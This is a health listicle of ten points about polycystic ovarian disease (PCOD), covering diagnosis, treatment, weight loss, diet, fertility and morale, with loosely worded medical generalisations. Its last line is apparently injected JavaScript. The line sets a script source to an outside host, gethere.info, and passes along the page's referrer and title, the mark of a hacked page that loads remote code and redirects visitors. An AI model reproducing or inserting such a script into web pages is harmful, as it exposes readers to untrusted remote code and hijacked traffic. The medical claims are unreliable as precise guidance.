Polycystic Overian Disease (PCOD) is one of the most common endocrine disorders amongst women. One out of every 10 women is getting affected with this mysterious disorder. You might have heard about the best diets for PCOD or weight issues with PCOD. But many unscientific notions about PCOD may mislead you. So lets take a look at top 10 essential facts about PCOD.
- YOU ARE NOT THE ONLY ONE: After diagnosis for the disease first thing may come to your mind that “WHY ME?”. Due to embarrassment women don’t speak about it and thus they are left with the feeling of loneliness. But there are hundreds of women with PCOD whom you can look at too.
- REGULAR CHECKING IS ESSENTIAL: As this disorder is difficult to diagnose, checking regularly after intervals is needed to confirm the diagnosis. So even if you are suspected, visit your doctor again to get it checked.
- IT IS NOT JUST LIMITED TO SKIN: We only have heard of blackening of skin or uncontrolled hair growth in addition to irregular periods. But PCOD can also result in uncontrolled weight gain, insulin resistance which can lead to diabetes and also can make it difficult to carry pregnancy.
- MEDICATIONS CAN HELP YOU: Hormonal therapies are the best and commonly used treatment for PCOD. Also to support the treatment, medicines like oral contraceptives, thyroid medications, diabetes medications are used. So do not leave the condition untreated to worsen the symptoms.
- WEIGHT LOSS CAN IMPROVE THE CONDITION: Vicious cycle of weight gain and worsening PCOD can be reversed with the help of Weight loss. It not only improve your hormonal responses but also improves response to fertility drugs and can increase chances for getting pregnant. Weight loss has a great impact to improve your PCOD.
- DIET AND EXERCISE – IMPERATIVE MEDICINE: Healthy diet not only helps you for your weight loss but also regulates your blood sugar by controlling insulin resistance. So do not miss an appointment with a Dietitian if you are even suspected or diagnosed with this condition.
- YOU CAN GET PREGNANT: Diagnosis of PCOD does not mean that you cannot conceive. With the right medications and treatments, chances of pregnancy are good. So do not get upset with the thought of not getting pregnant.
- PROBLEMS LIKE HIGH BLOOD PRESSURE, SLEEP APNEA CAN BE SEEN: These problems can be resolved with weight loss.
- RECOVERY WILL TAKE TIME: Treatment for PCOD requires time to show its results. So be patient enough and follow the treatment as mentioned to get the desired results.
- PCOD DOESN’T IDENTIFY YOU: Diagnosis should not take you to the isolation mode or loneliness. We as a Women are courageous and directive towards our goal achievement. So raise your moral, you are not the only one. Fight with this disorder to reinvent YOU!
s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;